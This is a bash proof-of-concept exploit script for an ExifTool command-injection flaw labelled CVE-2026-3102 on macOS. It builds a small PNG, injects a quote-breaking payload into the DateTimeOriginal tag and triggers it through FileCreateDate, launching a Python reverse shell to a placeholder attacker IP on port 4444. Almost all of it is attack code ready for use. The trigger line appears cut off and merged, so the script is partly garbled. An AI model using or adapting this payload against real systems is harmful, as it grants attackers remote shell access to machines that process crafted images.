#!/usr/bin/env bash # ============================================= # ExifTool CVE-2026-3102 Full PoC (macOS) # Using your exact Python reverse shell payload # ============================================= DEBUG="${DEBUG:-0}" dbg() { [[ "$DEBUG" == "1" ]] && echo -e "[DEBUG] $*" } # ================== CONFIG ================== KALI_IP="YOUR_ATTACKER_IP_HERE" # ← CHANGE THIS KALI_PORT="4444" # ← CHANGE THIS POC_FILEPATH="/tmp/exiftool_pwned" # Your exact payload (Python reverse shell) PAYLOAD="'; touch ${POC_FILEPATH}; (echo 'import socket,subprocess,os;s=socket.socket();s.connect((\"${KALI_IP}\",${KALI_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"])' | python3 &); #" PATH_TO_EXIFTOOL="${1:-exiftool}" echo "[+] ExifTool CVE-2026-3102 PoC - Python Reverse Shell" dbg "Using payload: ${PAYLOAD}" # Cleanup old files rm -f "$POC_FILEPATH" benign.png evil.png benign.png_original evil.png_original 2>/dev/null # ============================================= # 1. Create minimal valid PNG # ============================================= dbg "[+] Creating 1x1 benign PNG" { printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A' printf '\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89' printf '\x00\x00\x00\x0A\x49\x44\x41\x54\x78\x9C\x63\x00\x01\x00\x00\x05\x00\x01\x0D\x0A\x2D\xB4' printf '\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82' } > benign.png cp benign.png evil.png # ============================================= # 2. Inject payload into DateTimeOriginal # ============================================= dbg "[+] Injecting Python reverse shell payload" $PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png # ============================================= # 3. Trigger the vulnerability # ============================================= dbg "[+] Triggering RCE via FileCreateDate" $PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate/dev/null echo "[+] PoC finished."